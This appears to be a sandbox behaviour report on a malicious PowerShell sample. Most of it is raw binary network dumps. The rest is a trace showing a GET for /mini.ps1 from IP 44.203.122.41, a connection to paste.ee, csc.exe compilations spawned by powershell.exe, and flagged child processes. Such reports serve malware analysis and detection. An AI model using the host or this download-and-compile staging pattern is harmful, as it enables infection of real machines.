Data received Ù$Nhoÿ¬þ\Êàh沇¢Ç+¾],YŽ½.Ÿî… β¶l =UFLè|- Bj$+¡©¸p]© XwŒÑ"ÃË%Y}£‚ãLc¾¬ˆõ"‰õ¥xȈÿä?P±»û˜™¨ 4?‡áåzY0¡ž Ø´¿™6áaVáÊÀZÏËWt>¦ÁæÃØYx•NE@Å}—‰}b8\3Ï<"M#^©áJíÖ*OsCíú蘉-Ϫ¥g‚ú›8•BLö΄ßʾÍÊÖÌZ´<ˆëPT3 '¹a4÷÷«z<”JmI¯UGFöái£Y›A‚—'K_2‚¢‘ÊٞíE6íäÉÌÎ1Cä]nx': >Pµq:»Yûéô{bÕÈãøÁW kÐU§£;%>ã:r´Oq¡·˜ò“Jý)Bº8Ïk¦on,”Æœ”Ñ]u āßØ¢½güöu8eêL“š“¾ƒX5V¨&5P7*ÎÔç#àð‘Uk÷iŸ%êk *p×Ý-“™M4Ý_IÒ;$Oxٓ¦žÿsÖJ¤;²0}kRIMä特Îi@®¦þPÑðw*›oʼnž_ÞpÌ6Ö }¸k­ ¸'=!°1t©º3»L:”ÍA?"” EĐa+§Wºz OÜ>4®ƒtô™.…««ž@‰œõ̃۬©¢· …•F‘uá¿ÿ5\ïí†Â(õFê¤Ý³t7¦dèÆþ |ér7y-Š¬Ò¤}¥Óg&ŠM#v*o*ÝãE”ð­ýˆ.øp|Ù²Ir…­³ÁaÚJ¢Ç¿’Ørq/™*dʾcл‚IÇt&êbo>§&Idm%{ˆÐ=ÂFnљ͉RäS•ü ¯ýyC‚g¨·#t;Iæ®Ðab+|GÔ^éHÚ&Zé!oh·W3âï-ý‡MªZ§vyÉËøÓL†Œ„è pGPd0ñE©r Éè"AA,!®'Ú[åâ×W)§ÆµSlä#¤AÝ–ó ¼„‘’L¦ù3U7±|­<ã/‚§Z@€9Wûñië_;QôøòpŽMÐÜÔÑÇXºýáoÔîx—ցxñZþ:m’ Y}º³¾£œË»Á(Qó“cdïB[»Wˆ[Ø vI@¿8´gùØ"GHgÆ-£šˆŽ€©3­G•Ž8ŽÌ +#ŠL÷BÃÁ8ÏÑç{µrñ–u7]ґ)Ðâ]/=ébš—Ž+¸R4pÎ.S݈ ܵ+®ò<|ëÀ”ÓÄl©ŽÈö·‘Fv›GgHwÜß9‚ëFÒ¬'ðþzÝq‚7äAO¤¼òd÷Þ´¢ÒšKð tÕVhÀ(¦¿´ø\Õv;˜AE‚m¶ðÈq +T~š m`¤Úàp4ß]š^Z ’kç0ä¯cld„zIònµä}°˜+Á‘Û<úªž{žÐúV¦ÚX`­êϳk¨ WÙKe¹Î‹‡ÿöºÖô§žÛÛ5èt€SöNB#jñu].<Vgйù:L ÉiÓvxiL“G>€¨‘ ¹¥…äUéû̌ŸÓt¬±Áÿ(+߶˜ö¨:HqüÑÛoŔeÌYRgKÃðoæà0¥x8ºWþ:tÓû{ìÒX80.žùeÊ«¨ÏQháßÙM&´ÍÑnúߏSOÆâéýUŠ0Ÿ¦ê„¹›åKuR~k‡!㷆K––)ßk¶'³8E+²F™ÝTøWba¨÷‹o»8†:n?s ‘ä“i¬E›¶bä®O6«Gjï©ål¡zæUú€gôUžâ±÷ª
Data received ‚M©Ï>„¯ó¸«õªݗ2™Ï0dbí-+Ø@tw¼èȓt…ˆÝì¹çÌËæØm)³¨§aÒmë|&b?¸˜Þ;d§‡V_÷‰¼ŽkÈ¿£FXá`㿔Ezu}ÜòÊ¢ß`¥×­vG/Pۀڙª=Ç/Äá)\]RÏö¿Uû\w ¶3É4Ì;Ü]¬Ó&¼ "3 …Qɑ¢ò úKÙÍr=aʱD¹»›ð‰ý™l¾/ý30~ƒ;õ&¦ÿŸç!Ô83t¥×ôyw1g›^î+£Úâ0y‹¥Õ˓]ȟ#׎J•óÖF¯¾²È-øàöö—¶¤Ž;JÓ÷ÏԒyåã”éiï9·)ƧæÂc0¢ëÝþæ!²½2, ¸4áɆF—áR¯Ð9ˆË>9ò2!¬ìÉ _çŒ1¶ ñÈ|©f -÷[BŒP´FP]˜Y¸«€ñ[øÓWÑsޞ"\H§Ê¯$ÁR¹öçt̶¾M,Ú':æÎx–¥jõùôçQÚOtãåùÛrªp¦"@ø“p^û`b߯ù2Wœ¾BÐi]bê\@Æo¿j9CîÁؓӞuÃÕe¾e‚7'O>™@ÞH"q¿û{4Ë*„]°¢ÿ¸=Ùÿó\óºÓ¦;ëtO‡x翚דÇÿ`üg ê Ã6‡Ì2ëËÀ_‰ñ™wÌgqLëžläËM6”šŸF\GRÐ;fF_üû=Ò+¸ESô¹¸©LÞø¼Æ®òý”¸M¤½§È͔]#Wuâ–é°Nw'«;x+º@ਠ2¥êh67Aˆ 'tðßNüd· RhY SFÍ!0qrÒgƒQ^CÅa€<)?À»`Šçž2™w+&³„…» >ƙpÉÃë^¤¡½§?¼rª)jB|“° ¢ˆ´Ï…èÑ.Ig?[!aD D÷™ém¿¹üȖý6¸÷ì(»“ðû“+ŽàuýH` üî#$e|â… f ³ÖVw¥‹ææïü’ÝÆvW·$6AT 踮xì'ýú$. óWO6Ü܉m£6GæÊÏÅmÿ }®t ¸›Hv5'4l–§÷%1s*Æn+wA4LùŠéÙwÜÌnÈ GyáàJez £’ªSù Û£'f·ºPص%úZ¸Xœê»×6[œ`@m­üL`É.s¿Ð3–W(èM§aVM±%cíøe¸41§ìð¡AèT³¹6¯—\Àa>Ð\*âwn«œ€ ,¼m£ÐA@ű¨ƒRÚÍh®ò9ÝôË\NJ\Èâþ-vÿ¥øµ´•>ec•ÅIåËóºŽ[ÁeiYþi‡…æ‡M*DWÈ:ª385G|ÅY²xÞx>Ú%¶9x+ïzäÇNU•$ÐÁ켇ޜGd´9ß?ªÀòf}TÎ%«Š®ûâ®>3aRndÄ vL¿YÉ%õKÄå W‚ᮧZß"ÞÓm¯QŠPdÒ:@SgΚHǖ…,®FÍHï4X äÿ4Î3E6ŸjrÓþ®‡AKD¿«n,ž…u³ªæƒµ±ÛóNå¡EÀH¶€ÜìîÄèdڍ÷ü¢l؆¿#ÌãC5˜×ÿ*-Æú˜]ž+M¼ E=~Äh\õMOó Ô\;æ€Ê%X¾‘ϦÁV’}ªùhUMŠ Å4âl`#0ØSîeæɋ½t{m9~š[å‰(ÕÜoé8*Õ ð ¿ç†³åŸçøòÐ4=Á+›eŠPv.%¬§w™IDâÍ7陨õ÷~Cz|-ã
Data received þ->÷ÇØ»t¢”ÌW$–çi5c\x6¦Táñ)çauQ0é,÷Š:µGüä‰fßhe=‚ ~ÌHÛË0ž-%:ÜÜߐǘ ‰1ëñ۟jbÛ zUß!Xˆ°Ê¿ n+­ {ššsÓ<À•èð”3–w1nsGÄè[D÷íBº£jcÒ¡ü]¨îLëyâ+}4„Lã_¦9¡¹9Cý†_֒y3e/vœ5 Éä¡|Aé”*äññ‡D˜!‡2øZ ˜•ðõ Øðë Ë[fµKÝN=sOŒ„TøQ!uà:u¨…u˜®‘ç—YÑ@UªZ–DüxuÇ|Twÿ™o' YtcÐk,NRçYÒ¦œ/ƒÕÇ:!Ûɑ ˜ºE /숯clâ³¢”SN$ÆÆjHk-xR_gD`%TƒHÑTÛéo+{>aùqow£$õfxqïç[·,ÞHÙ*O9tõêٙ’ƒhwõ¹¤Z þóáÔ¸ j½ÓsIÌߍ¬!³`Ê¥ÿ®gŠøÇpn„“×ëàQS9ñ³?wl+wx/Ûo^nºÄýÜV ž¸Z±$èZO8{k¸k&‡›|:\au'¾±‚öIøYíCe¿7TÏжKhA¨ÝÏZA«TëCZegQ|‹€eÐó(` Å1bE€ÝÀràѹMn\‚NÙòHitH™Çƒ0z÷,ͨ©*ìFG!¢Î›ø8kx&]„ %Å¥§,/A̳îÛÉë$ ›ùÅíYTæσ>Ú¢[ø'S–¨h·Éÿìîê”5VLøœP{¾Øsc>T©œxÁH8düµo’€ƒy¿e«Ë§øb8™G§Ò~ŸÓyC’Sn~YáV ‚bkZõÎΕת¸X'Ž±¿UH_½H #oɅø ¾­^DjzeT7>>ùùîLW×È ÛÑÏ:Á6<\ Äî³FCÃÊs–_q÷C@rg•-%{(pÜ à ü.øžö8ÌÁ¢l)¦ÝÔ¹ú·AhcK7 ö¡ p´ \;41E¶7Lpµ];–Œ0Ÿ0za—®"[Lm/Ëa( X'°ôs¢CŒù‡ Øå€<êNš²ƒ‚¼ý€ÛbT >~b-¿Wô ¿ ÃŠ»P_V€&«õe¯x*G–Û咭 |5¼2€[½%À{å Ì&÷µì‚š3mzÞóʇÀõ`¬^½eã3†°Lg…÷zbâŽÊDÛÑ}Ð0> ËS\-•¦JqVEíq;Î_n ë'¢x÷d˜'\3²C;a7½Ç’U—À¾qLVn$øl‡mqŠ æpÒ¿«ô‰—Þ§Z‚êScjÊÿg ²Ë8öð㧏¢|bÚä1mUgØ5^ÑTm²QWmìxMÿ‚ì+Qt&M9ø] åå>¯“ÑüÒÁÑ¡!jÀws÷c lnlZO¸®éúCÒ¹Y×_…¹3¡ÿ™HƒéyfŽ¢k΀Íó¡i÷9D¿!r¬Os**½æ>vº¸–8Ç&³÷kè’Q­+£4:žÛáq_gIï%OO¶GpT&öçÎÊ;$ °Ý<ÕñÅ3²‚u2G´µŒ°òm VŸc± [l‘Üe3 âŒ4áºþÝ(`ÍóÒR/ž×;þZk‡u™œÕhg™¿"³-ÆV°  Eúӕ±(ag ÏD8Š̈y&@êÑóDº Íâ¤ü½þjÂKÒE5ºÕyónÖÖôÝgq»ïÊÀ„•®­Ø͈³;ÐTqº“¶M± h)Ü99™
Data received ~1§.‰uïsL²‰tñš1(§µÚüiC\R몥Ç î×p<äñKSoõQÅáF»E“åÏքç‘öç~;N/™’‰K¬« › 'N,’t  ÷$h.[þû؁I¤jôÑæyElـ톦‘·ÓQiåfíÒ,Á#NöýrþD·!"a‹”+ŒpQZü²AÒ<jË­= Ui³]¸»Fó¢µ­~­‹x«ßÍݐ$Êèÿ?ÉöªûT"JÇÌ¿$[dñëؘeÿýŠ‰²(®˜ëpK U{ô^Ãi݊mƒ³v6[ €Mv  ›¬Y»³ð4u\”ˆ‡˜ +49 †ž‹ٜࡰ)s‚ër=~S5n•h¸Z2 Rû à!C§ـyªôocBªs … ^ö_'¹û `™/.0Ènߟç·º$GDtZïÊXq:þ>§#O#Ýð¯ÍFl ÒU7Gp w[¶Ú¾|¶â4ð½âë$'Û$ÌÉÜåo|‹ :kæÕ î?>UI¶KÍ Ñ„§]¡¤_ý= ëz[Ömw¥Øµ70úҝF Y~ÖàWÕ4a^»bšçs¾Þ¿ù¾«ó­Ñ¿$˜¹9Ÿ|M&Y¾Á-³Ž3ãè÷ØHh>h*á°~`Yâ[\îX„=$¼¶Gí«-rÉÊËk/¡ Ë¡-¯±Á <,¨º²ÐÏCÎUˆbÛ:Ç(%^H [¨¬ñɹ„ö_•6вáA×~Ðù^øzÓø¶Nsbƒ‚ÕÃLÙršMúæuæ4yœÅ•åùe„ùÛëC"äy*£7[œëó€üUñ+Âgl-SÓü¤]Š»…Öyë07{>ucgDÞØ ”Œ9Œâÿá°"d×ÐAÙ0¾ˆ–À²ú*U`Òñ'Ê`/ùQ5#çÎãF8ˆZD«(¨¦MrüOò9õ¼ÏvmãJû`ØZWÌù‡˜Ÿ0¾ï–\õî…kØo?]`Ý`qïÒgžßÑ[ÂãÝeó@L”9›r›;¯|ìbD—n \7Û ¦’r¥°<´˜ÙÙc…ÎHMƒûýWdY*g-àþÛ^Á~„àþá¼Çf?¥hÅ@£Æ띐²Õ¿,»30)ˆZ;ŧSNúñŽìô»Ipj¦|]ÀÉ÷²Œž§¥ðÝq«™´ÂOƒ£$8•AH’*™ßlÕW¹Å}X7ô…•Ž• ûç×,Ž;U8 00 ä¶i½*§™`€]À0¼¦LÎóüû؊¢`o^)6®C£Ïó,Ð˝•ÑaÅ —­}]̽kèTzõU§=zŠQ¾‡ð<®|ži¾ÁBƒAä`3¾Šˆlï`Öv,ű… )K´qîúôø…þîئÝvXk¶j?”CÈLîoØ_ÍØyÂþ øšËHÏ|ÎUÑO8¤«K!Z#\ýÉi¬ä…ÆXŠ°Ýê,¾¶ÉÎ2ZDãGñ'$¾ÞêEâ³0POðY’c„B¬§Hâ;Û&h¯¢ÁŒ@¢.Âlj¼^çµð˜Hz85¸ûÙ³Ùvhž s=|ãnm1ŸGôæŸJ~·ÐÐËW =‰´FZÜeÆ"©Þ¶bC`mìå>ÐîÃ~°l«rD!à^"ý/Qè _É ´¿pž•‡õøN¹ÇbØ~[܉öªdd:öÈÕË;{´“\×ÈOˆ(¯†uz µÜ‡Þ+=zjØ ‚5_ oNY-ñ%¡³«È™(èW8¹>áKŒ+ÙXÝ¡õ¡MJºU–Öëƒ^ò+=£žLµC僦÷ç 
Data received @
Data received ÷â¾{þ:%]ý'¼¾_”h‰«´o“7Ðþ1—Ç ]ù1ËEċ;ØNAºV#j•N_¶?;ñÀŽ Üþ·6ßë»´ÏùðEÛ-ë"jíokðۇ-E}ÓpP<’î÷ÚXj­¿»² a ®S~K5¬Ëè¬z—VZ2 íâR{qŽX¡ÊBw×-þ ˜ìŠTß^Y[c¶5FòzSOýöuÃ×vYé•IgG´he^k´èµîyÞ#¼GÝ{ÐÊ”öòÂXõ/ü6½å•Nµa=5!È°Yò+>âµC›ðdêlxüEtÍü> £TÈï«WôUˆàìöÓJè1®eo‚àP≾«0¬(Ě*ïv@Bu^0“ì¹ùÕÁWö­6¼‡ºoNg7&éâµÌ`Ù9.õÞ<,®ß™Ÿ§VÌí«Ð›ä¼;"J¡¼Šˆjtgoi”®¦M¤qý&Á…JœKÇ^åµ¢Jð±P›ÈaÕ§(®ð0̕ÊèS¯[?Jñ2R ùhüÐQ…RP†d?~QŸþÈ·ÿóËía[‰ß×úFsb÷!éyœh:iÉÃo‘Yo'Ók‹ð§l.Ý:R'Gc­À¤.=–$oÙ´A%¡&NCº¶ÆÞ¢ÔCy>ãcXþ3SÎÄǪÿ,OLü.ë<ýÝç‹"@].¼×òÉ8;0³¤lÈ"nxNwV9¢»é&`.U`PŒŠ0›mÎßI¦šuÇéf¿È¼Ú$Þb +ÓZQÔîE«z5š)O÷E#µ¯â'ð]ÂaÏ]õÿ—£™ß‘mE­€D¯á:N‘ð¹ÄO Ë(§Â'IýE©z€†i=rð‰%ÐlU "ø_Ûx꾁ÈiÁ<ªV¦˜ÜŸ¯‘ÄgŒüÆsøõy‹)к&ò2ºöv¯ýĞ[}à¨í2¤r\ø÷$4ÅÃð—õm ÞDC“’Ÿô¿prÅ.±aÖҠת™ö’ ¬=(¤£1ý@l<#ÕMQŸ}c*d®‰o4œÃ|©ïZÍ;H Þô[jJN}ç²Æô’”1Ÿgm˅tsÈlšÃr#‘yHÓ+µS˜aŸMFøuo4'ÈfJ5b%ª 8p~`cý¦9§;ŒÚoj̓yü'FSïïíN|ô¤0ÍR+íK²É£¬ŸmypŠë(k6Ž=FÉ$W=HÃSLVˆLEIÞ¿úî£áJ-ê ®;J¸°=áaå‰ð õ˗zðý"Wô]!à„ý3ÝߜçûhÑiʂÚÓolj줙É%¦Þ|„úD—Jò*ž%àÌ(§»N3Âó †Å5óÕm9žóÆO÷F#Ö¼ñåH*f¯]p¥ D:¯[vÁ¬pÏpüeÚInuÁ)qG£Èã“ú¶”lx¨rLýøV2”ÈL.ø&k´ÅU‡Ö¯
Data received 
Data received íR¦Îx©&‡ÙIÅSu Œ­øÞ{"y¸D!T®Ü
Data sent GET /mini.ps1 HTTP/1.1 Host: 44.203.122.41 Connection: Keep-Alive
Data sent kge’ȍm«×–’­’GûRÉY«ouÂÅ´duÀÐ/5 ÀÀÀ À 28&ÿ paste.ee  
Data sent FBAXûv¨šì¶ISû)ÚyatÂچ >8ò(+þï¶CF“n¼ ¨NÏÛ\‹¨"M‡ŠÃ¤>Bï$¤®u0ÓñÈÆVî+0ZKô7Ȟã=V!â;O ühšuÞ¤J“ÈsÄýüÝ9„ƒ
Data sent `rYZñ¼V›@ƒ[KŸ¢c;ãvRà7…èñµaw»u´A;''Y6¾X)K L#l+øsØÈÂƽd£¬ ?Îp±¡Þž þZ2*ÇÚë<†óúœžSu£ß7€†0
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\9mrxduhn.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\afgz_pv1.cmdline"
host 44.203.122.41
Time & API Arguments Status Return Repeated

send

 buffer: GET /mini.ps1 HTTP/1.1 Host: 44.203.122.41 Connection: Keep-Alive
socket: 1540
sent: 71
1 71 0

send

 buffer: kge’ȍm«×–’­’GûRÉY«ouÂÅ´duÀÐ/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 1568
sent: 112
1 112 0

send

 buffer: FBAXûv¨šì¶ISû)ÚyatÂچ >8ò(+þï¶CF“n¼ ¨NÏÛ\‹¨"M‡ŠÃ¤>Bï$¤®u0ÓñÈÆVî+0ZKô7Ȟã=V!â;O ühšuÞ¤J“ÈsÄýüÝ9„ƒ
socket: 1568
sent: 134
1 134 0

send

 buffer: `rYZñ¼V›@ƒ[KŸ¢c;ãvRà7…èñµaw»u´A;''Y6¾X)K L#l+øsØÈÂƽd£¬ ?Îp±¡Þž þZ2*ÇÚë<†óúœžSu£ß7€†0
socket: 1568
sent: 101
1 101 0
parent_process powershell.exe martian_process "C:\Windows\system32\wermgr.exe" "-outproc" "2540" "928"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\9mrxduhn.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\afgz_pv1.cmdline"